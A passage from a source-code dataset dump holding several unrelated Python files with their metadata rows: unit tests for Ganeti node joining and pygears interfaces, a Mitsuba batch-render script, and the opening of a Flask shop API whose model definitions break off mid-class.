self.assertEqual(height, len(mock_hide_all.call_args_list))
@patch.object(Hand, "strings")
def test__strings__returns_mock_strings(self, mock_strings_method):
mock_strings = ["line 1", "line 2"]
mock_strings_method.return_value = mock_strings
height = 3
grid = Grid(height)
strings = grid.strings()
mock_strings_method.assert_called()
self.assertEqual(height, len(mock_strings_method.call_args_list))
self.assertEqual(mock_strings * height, strings)
def get_mock_position(self, x, y):
pos = Mock()
pos.x.return_value = x
pos.y.return_value = y
return pos
def get_mock_hand(self):
hand = Mock()
hand.hide_all = MagicMock()
return hand | true | true |
7901194eba875695bcdb1f6dc9753cda74759756 | 3,426 | py | Python | tools/render.py | fanbeatsman/interactive-viewer | b2561b394656fcfd125611553ab56efd3beae0f2 | [
"MIT"
] | 20 | 2019-06-22T17:02:48.000Z | 2022-03-10T05:29:45.000Z | tools/render.py | fanbeatsman/interactive-viewer | b2561b394656fcfd125611553ab56efd3beae0f2 | [
"MIT"
] | 2 | 2019-06-24T15:12:34.000Z | 2019-06-25T16:52:14.000Z | tools/render.py | fanbeatsman/interactive-viewer | b2561b394656fcfd125611553ab56efd3beae0f2 | [
"MIT"
] | 5 | 2019-07-01T20:15:49.000Z | 2021-04-08T13:58:00.000Z | from __future__ import print_function
"""
A script to batch render and update interactive viewer.
"""
import os
import sys
import argparse
import pyexr
import numpy as np
import json
import subprocess as sp
from analyze import update_stats, compute_stats, write_data
if __name__ == '__main__':
    # Parse arguments
    parser = argparse.ArgumentParser(
        description='Batch analysis of rendered images.')
    parser.add_argument('-mts', '--mitsuba',
                        help='mitsuba executable', type=str, default='./mitsuba')
    parser.add_argument('-r', '--ref',
                        help='reference image', type=str, required=True)
    parser.add_argument('-s', '--scene',
                        help='scene xml file', type=str, required=True)
    parser.add_argument('-o', '--options',
                        help='mitsuba options', type=str)
    parser.add_argument('-d', '--dir',
                        help='corresponding viewer scene directory', type=str, required=True)
    parser.add_argument('-n', '--name',
                        help='algorithm name', type=str, required=True)
    parser.add_argument('-a', '--alg',
                        help='mitsuba algorithm keyword', type=str, required=True)
    parser.add_argument('-t', '--timeout',
                        help='render time (s)', type=int)
    parser.add_argument('-f', '--frequency',
                        help='intermediate image output frequency (s)', type=int)
    parser.add_argument('-m', '--metrics',
                        help='difference metrics', nargs='+', choices=['l1', 'l2', 'mrse', 'mape', 'smape', 'dssim'], type=str)
    parser.add_argument('-eps', '--epsilon',
                        help='epsilon value', type=float, default=1e-2)
    parser.add_argument('-c', '--clip',
                        help='clipping values for min/max', nargs=2, type=float, default=[0, 1])
    args = parser.parse_args()

    # Build the Mitsuba command line; the output EXR is named after the
    # algorithm and placed next to the scene file.
    fname = '{}.exr'.format(args.name.replace(' ', '-'))
    out_path = os.path.join(os.path.dirname(args.scene), fname)
    render = '{} {} -D integrator={}'.format(
        args.mitsuba, args.scene, args.alg)
    if args.frequency:
        render = '{} -r {}'.format(render, args.frequency)
    if args.options:
        render = '{} {}'.format(render, args.options)
    render = '{} -o {}'.format(render, out_path)
    cmd = render.split()

    # Run the render; when -t is given, the render is cut off after that
    # many seconds via subprocess's timeout.
    sys.stdout.write('Rendering... ')
    sys.stdout.flush()
    try:
        sp.check_output(cmd, shell=False, timeout=args.timeout)
    except sp.TimeoutExpired:
        # Expected: the timeout is how the render time budget is enforced.
        pass
    # BUGFIX: 'done.' was previously printed only on the timeout path,
    # leaving the 'Rendering... ' line dangling when mitsuba finished on
    # its own (or when no -t was given).
    print('done.')

    # Update interactive viewer with the freshly rendered image.
    sys.stdout.write('Recomputing metrics... ')
    sys.stdout.flush()
    ref_fp = pyexr.open(args.ref)
    ref = np.array(ref_fp.get())
    img_fp = pyexr.open(out_path)
    img = np.array(img_fp.get())
    test = [{'name': args.name, 'data': img}]
    with open(os.path.join(args.dir, 'data.json'), 'r') as fp:
        data = json.load(fp)
    with open(os.path.join(args.dir, 'stats.json'), 'r') as fp:
        # NOTE(review): `stats` is loaded but never used; the load also acts
        # as a sanity check that stats.json exists — confirm before removing.
        stats = json.load(fp)
    data = update_stats(args.dir, data, ref, test,
                        args.metrics, args.clip, args.epsilon)
    write_data(args.dir, data)
    print('done.')
    web_url = os.path.abspath(os.path.join(args.dir, 'index.html'))
    print('Interactive viewer updated: {}'.format(web_url))
| 38.931818 | 127 | 0.590193 | from __future__ import print_function
import os
import sys
import argparse
import pyexr
import numpy as np
import json
import subprocess as sp
from analyze import update_stats, compute_stats, write_data
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Batch analysis of rendered images.')
parser.add_argument('-mts', '--mitsuba',
help='mitsuba executable', type=str, default='./mitsuba')
parser.add_argument('-r', '--ref',
help='reference image', type=str, required=True)
parser.add_argument('-s', '--scene',
help='scene xml file', type=str, required=True)
parser.add_argument('-o', '--options',
help='mitsuba options', type=str)
parser.add_argument('-d', '--dir',
help='corresponding viewer scene directory', type=str, required=True)
parser.add_argument('-n', '--name',
help='algorithm name', type=str, required=True)
parser.add_argument('-a', '--alg',
help='mitsuba algorithm keyword', type=str, required=True)
parser.add_argument('-t', '--timeout',
help='render time (s)', type=int)
parser.add_argument('-f', '--frequency',
help='intermediate image output frequency (s)', type=int)
parser.add_argument('-m', '--metrics',
help='difference metrics', nargs='+', choices=['l1', 'l2', 'mrse', 'mape', 'smape', 'dssim'], type=str)
parser.add_argument('-eps', '--epsilon',
help='epsilon value', type=float, default=1e-2)
parser.add_argument('-c', '--clip',
help='clipping values for min/max', nargs=2, type=float, default=[0, 1])
args = parser.parse_args()
fname = '{}.exr'.format(args.name.replace(' ', '-'))
out_path = os.path.join(os.path.dirname(args.scene), fname)
render = '{} {} -D integrator={}'.format(
args.mitsuba, args.scene, args.alg)
if args.frequency:
render = '{} -r {}'.format(render, args.frequency)
if args.options:
render = '{} {}'.format(render, args.options)
render = '{} -o {}'.format(render, out_path)
cmd = render.split()
sys.stdout.write('Rendering... ')
sys.stdout.flush()
try:
out = sp.check_output(cmd, shell=False, timeout=args.timeout)
except sp.TimeoutExpired as e:
print('done.')
sys.stdout.write('Recomputing metrics... ')
sys.stdout.flush()
ref_fp = pyexr.open(args.ref)
ref = np.array(ref_fp.get())
img_fp = pyexr.open(out_path)
img = np.array(img_fp.get())
test = [{'name': args.name, 'data': img}]
with open(os.path.join(args.dir, 'data.json'), 'r') as fp:
data = json.load(fp)
with open(os.path.join(args.dir, 'stats.json'), 'r') as fp:
stats = json.load(fp)
data = update_stats(args.dir, data, ref, test,
args.metrics, args.clip, args.epsilon)
write_data(args.dir, data)
print('done.')
web_url = os.path.abspath(os.path.join(args.dir, 'index.html'))
print('Interactive viewer updated: {}'.format(web_url))
| true | true |
7901199bf253ffa0258b22098bef2a7b600f551f | 8,681 | py | Python | test/py/ganeti.tools.prepare_node_join_unittest.py | regnauld/ganeti | c1d88461a964a5d0d89cd1ba0571429e01f0a1b5 | [
"BSD-2-Clause"
] | 2 | 2018-09-26T10:09:23.000Z | 2018-09-27T07:27:06.000Z | test/py/ganeti.tools.prepare_node_join_unittest.py | regnauld/ganeti | c1d88461a964a5d0d89cd1ba0571429e01f0a1b5 | [
"BSD-2-Clause"
] | null | null | null | test/py/ganeti.tools.prepare_node_join_unittest.py | regnauld/ganeti | c1d88461a964a5d0d89cd1ba0571429e01f0a1b5 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/python
#
# Copyright (C) 2012 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Script for testing ganeti.tools.prepare_node_join"""
import unittest
import shutil
import tempfile
import os.path
from ganeti import errors
from ganeti import constants
from ganeti import pathutils
from ganeti import compat
from ganeti import utils
from ganeti.tools import prepare_node_join
from ganeti.tools import common
import testutils
# Convenience aliases for frequently used attributes of the module under test.
_JoinError = prepare_node_join.JoinError
_DATA_CHECK = prepare_node_join._DATA_CHECK
class TestVerifyCertificate(testutils.GanetiTestCase):
  """Tests for the soft certificate verification used at node-join time."""
  def setUp(self):
    testutils.GanetiTestCase.setUp(self)
    self.tmpdir = tempfile.mkdtemp()
  def tearDown(self):
    testutils.GanetiTestCase.tearDown(self)
    shutil.rmtree(self.tmpdir)
  def testNoCert(self):
    # Empty input data contains no certificate; the soft check must pass
    # without invoking the verify callback (hence NotImplemented).
    common.VerifyCertificateSoft({}, error_fn=prepare_node_join.JoinError,
                                 _verify_fn=NotImplemented)
  def testGivenPrivateKey(self):
    # Presumably cert2.pem bundles a private key (see the test name), which
    # must be rejected — verify the fixture contents.
    # NOTE(review): this calls the private helper common._VerifyCertificateSoft
    # while testNoCert uses the public VerifyCertificateSoft — confirm both
    # names still exist in ganeti.tools.common.
    cert_filename = testutils.TestDataFilename("cert2.pem")
    cert_pem = utils.ReadFile(cert_filename)
    self.assertRaises(_JoinError, common._VerifyCertificateSoft,
                      cert_pem, _JoinError, _check_fn=NotImplemented)
  def testInvalidCertificate(self):
    # Garbage input must raise the X509 parsing error.
    self.assertRaises(errors.X509CertError,
                      common._VerifyCertificateSoft,
                      "Something that's not a certificate",
                      _JoinError, _check_fn=NotImplemented)
  @staticmethod
  def _Check(cert):
    # Minimal sanity check used as the _check_fn callback below.
    assert cert.get_subject()
  def testSuccessfulCheck(self):
    # A parseable certificate passes verification with a real check callback.
    cert_filename = testutils.TestDataFilename("cert1.pem")
    cert_pem = utils.ReadFile(cert_filename)
    common._VerifyCertificateSoft(cert_pem, _JoinError,
                                  _check_fn=self._Check)
class TestUpdateSshDaemon(unittest.TestCase):
  def setUp(self):
    """Create a temp dir and per-type (private, public) key file paths."""
    unittest.TestCase.setUp(self)
    self.tmpdir = tempfile.mkdtemp()
    # Maps key type -> (private key path, public key path) inside tmpdir.
    self.keyfiles = {
      constants.SSHK_RSA:
        (utils.PathJoin(self.tmpdir, "rsa.private"),
         utils.PathJoin(self.tmpdir, "rsa.public")),
      constants.SSHK_DSA:
        (utils.PathJoin(self.tmpdir, "dsa.private"),
         utils.PathJoin(self.tmpdir, "dsa.public")),
      constants.SSHK_ECDSA:
        (utils.PathJoin(self.tmpdir, "ecdsa.private"),
         utils.PathJoin(self.tmpdir, "ecdsa.public")),
      }
  def tearDown(self):
    """Remove the temporary key directory."""
    unittest.TestCase.tearDown(self)
    shutil.rmtree(self.tmpdir)
  def testNoKeys(self):
    """Without key data, UpdateSshDaemon must write nothing at all."""
    data_empty_keys = {
      constants.SSHS_SSH_HOST_KEY: [],
      }
    # Both a missing key list and an empty one must be no-ops, regardless
    # of the dry-run flag.
    for data in [{}, data_empty_keys]:
      for dry_run in [False, True]:
        prepare_node_join.UpdateSshDaemon(data, dry_run,
                                          _runcmd_fn=NotImplemented,
                                          _keyfiles=NotImplemented)
    # Nothing may have been written to the temporary directory.
    self.assertEqual(os.listdir(self.tmpdir), [])
def _TestDryRun(self, data):
prepare_node_join.UpdateSshDaemon(data, True, _runcmd_fn=NotImplemented,
_keyfiles=self.keyfiles)
self.assertEqual(os.listdir(self.tmpdir), [])
def testDryRunRsa(self):
self._TestDryRun({
constants.SSHS_SSH_HOST_KEY: [
(constants.SSHK_RSA, "rsapriv", "rsapub"),
],
})
def testDryRunDsa(self):
self._TestDryRun({
constants.SSHS_SSH_HOST_KEY: [
(constants.SSHK_DSA, "dsapriv", "dsapub"),
],
})
def testDryRunEcdsa(self):
self._TestDryRun({
constants.SSHS_SSH_HOST_KEY: [
(constants.SSHK_ECDSA, "ecdsapriv", "ecdsapub"),
],
})
def _RunCmd(self, fail, cmd, interactive=NotImplemented):
self.assertTrue(interactive)
self.assertEqual(cmd, [pathutils.DAEMON_UTIL, "reload-ssh-keys"])
if fail:
exit_code = constants.EXIT_FAILURE
else:
exit_code = constants.EXIT_SUCCESS
return utils.RunResult(exit_code, None, "stdout", "stderr",
utils.ShellQuoteArgs(cmd),
NotImplemented, NotImplemented)
def _TestUpdate(self, failcmd):
data = {
constants.SSHS_SSH_HOST_KEY: [
(constants.SSHK_DSA, "dsapriv", "dsapub"),
(constants.SSHK_ECDSA, "ecdsapriv", "ecdsapub"),
(constants.SSHK_RSA, "rsapriv", "rsapub"),
],
constants.SSHS_SSH_KEY_TYPE: "dsa",
constants.SSHS_SSH_KEY_BITS: 1024,
}
runcmd_fn = compat.partial(self._RunCmd, failcmd)
if failcmd:
self.assertRaises(_JoinError, prepare_node_join.UpdateSshDaemon,
data, False, _runcmd_fn=runcmd_fn,
_keyfiles=self.keyfiles)
else:
prepare_node_join.UpdateSshDaemon(data, False, _runcmd_fn=runcmd_fn,
_keyfiles=self.keyfiles)
self.assertEqual(sorted(os.listdir(self.tmpdir)), sorted([
"rsa.public", "rsa.private",
"dsa.public", "dsa.private",
"ecdsa.public", "ecdsa.private",
]))
self.assertEqual(utils.ReadFile(utils.PathJoin(self.tmpdir, "rsa.public")),
"rsapub")
self.assertEqual(utils.ReadFile(utils.PathJoin(self.tmpdir, "rsa.private")),
"rsapriv")
self.assertEqual(utils.ReadFile(utils.PathJoin(self.tmpdir, "dsa.public")),
"dsapub")
self.assertEqual(utils.ReadFile(utils.PathJoin(self.tmpdir, "dsa.private")),
"dsapriv")
self.assertEqual(utils.ReadFile(utils.PathJoin(
self.tmpdir, "ecdsa.public")), "ecdsapub")
self.assertEqual(utils.ReadFile(utils.PathJoin(
self.tmpdir, "ecdsa.private")), "ecdsapriv")
def testSuccess(self):
self._TestUpdate(False)
def testFailure(self):
self._TestUpdate(True)
class TestUpdateSshRoot(unittest.TestCase):
  """Tests for prepare_node_join.UpdateSshRoot (root's SSH key setup)."""
  def setUp(self):
    unittest.TestCase.setUp(self)
    self.tmpdir = tempfile.mkdtemp()
    self.sshdir = utils.PathJoin(self.tmpdir, ".ssh")
  def tearDown(self):
    unittest.TestCase.tearDown(self)
    shutil.rmtree(self.tmpdir)
  def _GetHomeDir(self, user):
    # Stub home-directory lookup: only the SSH login user may be asked for.
    self.assertEqual(user, constants.SSH_LOGIN_USER)
    return self.tmpdir
  def testDryRun(self):
    # Dry-run creates the ~/.ssh directory but must not write any keys.
    data = {
      constants.SSHS_SSH_ROOT_KEY: [
        (constants.SSHK_RSA, "aaa", "bbb"),
        ]
      }
    prepare_node_join.UpdateSshRoot(data, True,
                                    _homedir_fn=self._GetHomeDir)
    self.assertEqual(os.listdir(self.tmpdir), [".ssh"])
    self.assertEqual(os.listdir(self.sshdir), [])
  def testUpdate(self):
    data = {
      constants.SSHS_SSH_ROOT_KEY: [
        (constants.SSHK_DSA, "privatedsa", "ssh-dss pubdsa"),
        ],
      constants.SSHS_SSH_KEY_TYPE: "dsa",
      constants.SSHS_SSH_KEY_BITS: 1024,
      }
    prepare_node_join.UpdateSshRoot(data, False,
                                    _homedir_fn=self._GetHomeDir)
    self.assertEqual(os.listdir(self.tmpdir), [".ssh"])
    self.assertEqual(sorted(os.listdir(self.sshdir)),
                     sorted(["authorized_keys", "id_dsa", "id_dsa.pub"]))
    # Modern unittest spellings: assertIsNotNone instead of
    # assertTrue(... is not None), and assertEqual instead of the
    # deprecated assertEquals alias.
    self.assertIsNotNone(utils.ReadFile(utils.PathJoin(self.sshdir,
                                                       "id_dsa")))
    pub_key = utils.ReadFile(utils.PathJoin(self.sshdir, "id_dsa.pub"))
    self.assertIsNotNone(pub_key)
    self.assertEqual(utils.ReadFile(utils.PathJoin(self.sshdir,
                                                   "authorized_keys")),
                     pub_key)
if __name__ == "__main__":
  # Run all test cases via Ganeti's unittest wrapper.
  testutils.GanetiTestProgram()
| 34.177165 | 80 | 0.665592 |
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
import unittest
import shutil
import tempfile
import os.path
from ganeti import errors
from ganeti import constants
from ganeti import pathutils
from ganeti import compat
from ganeti import utils
from ganeti.tools import prepare_node_join
from ganeti.tools import common
import testutils
_JoinError = prepare_node_join.JoinError
_DATA_CHECK = prepare_node_join._DATA_CHECK
class TestVerifyCertificate(testutils.GanetiTestCase):
def setUp(self):
testutils.GanetiTestCase.setUp(self)
self.tmpdir = tempfile.mkdtemp()
def tearDown(self):
testutils.GanetiTestCase.tearDown(self)
shutil.rmtree(self.tmpdir)
def testNoCert(self):
common.VerifyCertificateSoft({}, error_fn=prepare_node_join.JoinError,
_verify_fn=NotImplemented)
def testGivenPrivateKey(self):
cert_filename = testutils.TestDataFilename("cert2.pem")
cert_pem = utils.ReadFile(cert_filename)
self.assertRaises(_JoinError, common._VerifyCertificateSoft,
cert_pem, _JoinError, _check_fn=NotImplemented)
def testInvalidCertificate(self):
self.assertRaises(errors.X509CertError,
common._VerifyCertificateSoft,
"Something that's not a certificate",
_JoinError, _check_fn=NotImplemented)
@staticmethod
def _Check(cert):
assert cert.get_subject()
def testSuccessfulCheck(self):
cert_filename = testutils.TestDataFilename("cert1.pem")
cert_pem = utils.ReadFile(cert_filename)
common._VerifyCertificateSoft(cert_pem, _JoinError,
_check_fn=self._Check)
class TestUpdateSshDaemon(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
self.tmpdir = tempfile.mkdtemp()
self.keyfiles = {
constants.SSHK_RSA:
(utils.PathJoin(self.tmpdir, "rsa.private"),
utils.PathJoin(self.tmpdir, "rsa.public")),
constants.SSHK_DSA:
(utils.PathJoin(self.tmpdir, "dsa.private"),
utils.PathJoin(self.tmpdir, "dsa.public")),
constants.SSHK_ECDSA:
(utils.PathJoin(self.tmpdir, "ecdsa.private"),
utils.PathJoin(self.tmpdir, "ecdsa.public")),
}
def tearDown(self):
unittest.TestCase.tearDown(self)
shutil.rmtree(self.tmpdir)
def testNoKeys(self):
data_empty_keys = {
constants.SSHS_SSH_HOST_KEY: [],
}
for data in [{}, data_empty_keys]:
for dry_run in [False, True]:
prepare_node_join.UpdateSshDaemon(data, dry_run,
_runcmd_fn=NotImplemented,
_keyfiles=NotImplemented)
self.assertEqual(os.listdir(self.tmpdir), [])
def _TestDryRun(self, data):
prepare_node_join.UpdateSshDaemon(data, True, _runcmd_fn=NotImplemented,
_keyfiles=self.keyfiles)
self.assertEqual(os.listdir(self.tmpdir), [])
def testDryRunRsa(self):
self._TestDryRun({
constants.SSHS_SSH_HOST_KEY: [
(constants.SSHK_RSA, "rsapriv", "rsapub"),
],
})
def testDryRunDsa(self):
self._TestDryRun({
constants.SSHS_SSH_HOST_KEY: [
(constants.SSHK_DSA, "dsapriv", "dsapub"),
],
})
def testDryRunEcdsa(self):
self._TestDryRun({
constants.SSHS_SSH_HOST_KEY: [
(constants.SSHK_ECDSA, "ecdsapriv", "ecdsapub"),
],
})
def _RunCmd(self, fail, cmd, interactive=NotImplemented):
self.assertTrue(interactive)
self.assertEqual(cmd, [pathutils.DAEMON_UTIL, "reload-ssh-keys"])
if fail:
exit_code = constants.EXIT_FAILURE
else:
exit_code = constants.EXIT_SUCCESS
return utils.RunResult(exit_code, None, "stdout", "stderr",
utils.ShellQuoteArgs(cmd),
NotImplemented, NotImplemented)
def _TestUpdate(self, failcmd):
data = {
constants.SSHS_SSH_HOST_KEY: [
(constants.SSHK_DSA, "dsapriv", "dsapub"),
(constants.SSHK_ECDSA, "ecdsapriv", "ecdsapub"),
(constants.SSHK_RSA, "rsapriv", "rsapub"),
],
constants.SSHS_SSH_KEY_TYPE: "dsa",
constants.SSHS_SSH_KEY_BITS: 1024,
}
runcmd_fn = compat.partial(self._RunCmd, failcmd)
if failcmd:
self.assertRaises(_JoinError, prepare_node_join.UpdateSshDaemon,
data, False, _runcmd_fn=runcmd_fn,
_keyfiles=self.keyfiles)
else:
prepare_node_join.UpdateSshDaemon(data, False, _runcmd_fn=runcmd_fn,
_keyfiles=self.keyfiles)
self.assertEqual(sorted(os.listdir(self.tmpdir)), sorted([
"rsa.public", "rsa.private",
"dsa.public", "dsa.private",
"ecdsa.public", "ecdsa.private",
]))
self.assertEqual(utils.ReadFile(utils.PathJoin(self.tmpdir, "rsa.public")),
"rsapub")
self.assertEqual(utils.ReadFile(utils.PathJoin(self.tmpdir, "rsa.private")),
"rsapriv")
self.assertEqual(utils.ReadFile(utils.PathJoin(self.tmpdir, "dsa.public")),
"dsapub")
self.assertEqual(utils.ReadFile(utils.PathJoin(self.tmpdir, "dsa.private")),
"dsapriv")
self.assertEqual(utils.ReadFile(utils.PathJoin(
self.tmpdir, "ecdsa.public")), "ecdsapub")
self.assertEqual(utils.ReadFile(utils.PathJoin(
self.tmpdir, "ecdsa.private")), "ecdsapriv")
def testSuccess(self):
self._TestUpdate(False)
def testFailure(self):
self._TestUpdate(True)
class TestUpdateSshRoot(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
self.tmpdir = tempfile.mkdtemp()
self.sshdir = utils.PathJoin(self.tmpdir, ".ssh")
def tearDown(self):
unittest.TestCase.tearDown(self)
shutil.rmtree(self.tmpdir)
def _GetHomeDir(self, user):
self.assertEqual(user, constants.SSH_LOGIN_USER)
return self.tmpdir
def testDryRun(self):
data = {
constants.SSHS_SSH_ROOT_KEY: [
(constants.SSHK_RSA, "aaa", "bbb"),
]
}
prepare_node_join.UpdateSshRoot(data, True,
_homedir_fn=self._GetHomeDir)
self.assertEqual(os.listdir(self.tmpdir), [".ssh"])
self.assertEqual(os.listdir(self.sshdir), [])
def testUpdate(self):
data = {
constants.SSHS_SSH_ROOT_KEY: [
(constants.SSHK_DSA, "privatedsa", "ssh-dss pubdsa"),
],
constants.SSHS_SSH_KEY_TYPE: "dsa",
constants.SSHS_SSH_KEY_BITS: 1024,
}
prepare_node_join.UpdateSshRoot(data, False,
_homedir_fn=self._GetHomeDir)
self.assertEqual(os.listdir(self.tmpdir), [".ssh"])
self.assertEqual(sorted(os.listdir(self.sshdir)),
sorted(["authorized_keys", "id_dsa", "id_dsa.pub"]))
self.assertTrue(utils.ReadFile(utils.PathJoin(self.sshdir, "id_dsa"))
is not None)
pub_key = utils.ReadFile(utils.PathJoin(self.sshdir, "id_dsa.pub"))
self.assertTrue(pub_key is not None)
self.assertEquals(utils.ReadFile(utils.PathJoin(self.sshdir,
"authorized_keys")),
pub_key)
if __name__ == "__main__":
testutils.GanetiTestProgram()
| true | true |
7901199d5463ed6267d0b721d5056abb66f44d76 | 442 | py | Python | tests/svgen/test_sieve.py | Risto97/pygears | 19393e85101a16762cb3bbbf3010946ef69217f2 | [
"MIT"
] | null | null | null | tests/svgen/test_sieve.py | Risto97/pygears | 19393e85101a16762cb3bbbf3010946ef69217f2 | [
"MIT"
] | null | null | null | tests/svgen/test_sieve.py | Risto97/pygears | 19393e85101a16762cb3bbbf3010946ef69217f2 | [
"MIT"
] | null | null | null | from nose import with_setup
from pygears import Intf, clear
from pygears.typing import Queue, Uint
from utils import svgen_check
@with_setup(clear)
@svgen_check(['sieve_0v2_7_8v10.sv'])
def test_uint():
    # The sieve keeps bit indices 0-1, 7 and 8-9 of the Uint[10] input
    # (5 indices total), so the output interface carries Uint[5].
    iout = Intf(Uint[10])[:2, 7, 8:]
    assert iout.dtype == Uint[5]
@with_setup(clear)
@svgen_check(['sieve_0v2_3_5v7.sv'])
def test_queue():
    # Selects 4 of the 6 Queue levels (indices 0, 1, 3 and 5), so the
    # resulting dtype is Queue[Uint[2], 4].
    iout = Intf(Queue[Uint[2], 6])[:2, 3, 5:]
    assert iout.dtype == Queue[Uint[2], 4]
| 21.047619 | 45 | 0.690045 | from nose import with_setup
from pygears import Intf, clear
from pygears.typing import Queue, Uint
from utils import svgen_check
@with_setup(clear)
@svgen_check(['sieve_0v2_7_8v10.sv'])
def test_uint():
iout = Intf(Uint[10])[:2, 7, 8:]
assert iout.dtype == Uint[5]
@with_setup(clear)
@svgen_check(['sieve_0v2_3_5v7.sv'])
def test_queue():
iout = Intf(Queue[Uint[2], 6])[:2, 3, 5:]
assert iout.dtype == Queue[Uint[2], 4]
| true | true |
79011ab78b18cfdf827a9175719865cd05515572 | 11,814 | py | Python | server/API.py | lucas-almeida-silva/gama-sports | c287680a645941bc16fc09a350167922171fa30d | [
"MIT"
] | null | null | null | server/API.py | lucas-almeida-silva/gama-sports | c287680a645941bc16fc09a350167922171fa30d | [
"MIT"
] | null | null | null | server/API.py | lucas-almeida-silva/gama-sports | c287680a645941bc16fc09a350167922171fa30d | [
"MIT"
] | 1 | 2020-11-28T13:44:45.000Z | 2020-11-28T13:44:45.000Z | from flask import Flask, request, jsonify, make_response
from flask_sqlalchemy import SQLAlchemy
import uuid
from werkzeug.security import generate_password_hash, check_password_hash
import jwt
import datetime
from functools import wraps
from flask_mail import Mail, Message
import bcrypt
import re
from validate_email import validate_email
from validate_docbr import CPF
from sqlalchemy.ext.declarative import declarative_base
from flask_marshmallow import Marshmallow
from flask_cors import CORS, cross_origin
from marshmallow import fields
# Declarative base used (together with db.Model) by the ORM models below.
Base = declarative_base()
# Application and extension setup.
app = Flask(__name__)
# Fixed typo: the option is "supports_credentials" (the per-view
# @cross_origin decorators below already spell it correctly); the old
# "support_credentials" kwarg was silently ignored.
CORS(app, supports_credentials=True)
app.config['CORS_HEADERS'] = 'Content-Type'
# NOTE(review): secret key and DB/mail credentials should come from the
# environment, not source control.
app.config['SECRET_KEY'] = 'thisissecret'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///banco.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
# Outgoing mail: Gmail SMTP over SSL; credentials intentionally blank here.
app.config['MAIL_SERVER'] = 'smtp.gmail.com'
app.config['MAIL_PORT'] = 465
app.config['MAIL_USERNAME'] = ''
app.config['MAIL_PASSWORD'] = ''
app.config['MAIL_USE_TLS'] = False
app.config['MAIL_USE_SSL'] = True
# Instantiate Mail once, *after* the MAIL_* settings are in place.  The
# original code also created an unused Mail(app) before configuring the
# app; that first instance has been dropped.
mail = Mail(app)
db = SQLAlchemy(app)
ma = Marshmallow(app)
class User(db.Model):
    """Registered customer account."""
    id = db.Column(db.Integer, primary_key=True)
    # Random UUID exposed to clients instead of the numeric primary key.
    public_id = db.Column(db.String(50), unique=True)
    name = db.Column(db.String(50))
    # Brazilian taxpayer id, digits only (11 characters).
    cpf = db.Column(db.String(11))
    # Stored as text in "dd/mm/YYYY" form (see create_user's strptime format).
    birthdate = db.Column(db.String(10))
    # "M" or "F" (validated in create_user).
    gender = db.Column(db.String(1))
    phone = db.Column(db.String(11))
    # NOTE(review): uniqueness of email/cpf is enforced only in create_user,
    # not by a DB constraint -- confirm whether a unique index is wanted.
    email = db.Column(db.String(50))
    # Werkzeug sha256 hash of the password, never the plain text.
    password = db.Column(db.String(80))
    # Password-recovery token and its UTC expiry timestamp (both stored as
    # text; None while no reset is pending).
    passwordResetToken = db.Column(db.String(250))
    passwordResetExpires = db.Column(db.String(100))
class Product(db.Model, Base):
    """Catalogue item offered by the shop."""
    __tablename__ = 'products'
    product_id = db.Column(db.Integer, primary_key=True)
    description = db.Column(db.String(250))
    price = db.Column(db.Float)
    # Number of payment installments offered for the price.
    installments = db.Column(db.Integer)
    # All sizes of the model vs. the ones currently in stock; stored as text
    # (presumably a delimited list -- TODO confirm the encoding used).
    sizes = db.Column(db.String(50))
    availableSizes = db.Column(db.String(50))
    gender = db.Column(db.String(1))
    material = db.Column(db.String(50))
    color = db.Column(db.String(50))
    brand = db.Column(db.String(50))
    # Many-to-many with Cart through the cart_products association table.
    carts = db.relationship('Cart',secondary='cart_products')
class Image(db.Model, Base):
    """Picture attached to a product (one product, many images)."""
    __tablename__ = 'products_imgs'
    img_id = db.Column(db.Integer, primary_key=True)
    url = db.Column(db.String(300))
    product_id = db.Column(db.Integer, db.ForeignKey('products.product_id'))
    # Owning product; also exposes Product.images via the backref.
    product = db.relationship('Product', backref='images')
class Cart(db.Model, Base):
    """A saved shopping cart belonging to one user."""
    __tablename__ = 'cart'
    cart_id = db.Column(db.Integer, primary_key=True)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
    total_amount = db.Column(db.Float)
    # Creation timestamp, defaulting to UTC "now".
    create_dttm = db.Column(db.DateTime, default=datetime.datetime.utcnow)
    # NOTE(review): backref='images' looks like a copy-paste from
    # Image.product -- it publishes this relationship on User as
    # "User.images".  Confirm and rename (e.g. to 'carts'), minding any
    # callers that may already rely on User.images.
    user = db.relationship('User', backref='images')
    products = db.relationship('Product', secondary = 'cart_products')
class CP(db.Model, Base):
    """Association row linking a Cart to a Product (one cart line item)."""
    __tablename__ = 'cart_products'
    id = db.Column(db.Integer, primary_key=True)
    product_id = db.Column(db.Integer, db.ForeignKey('products.product_id'))
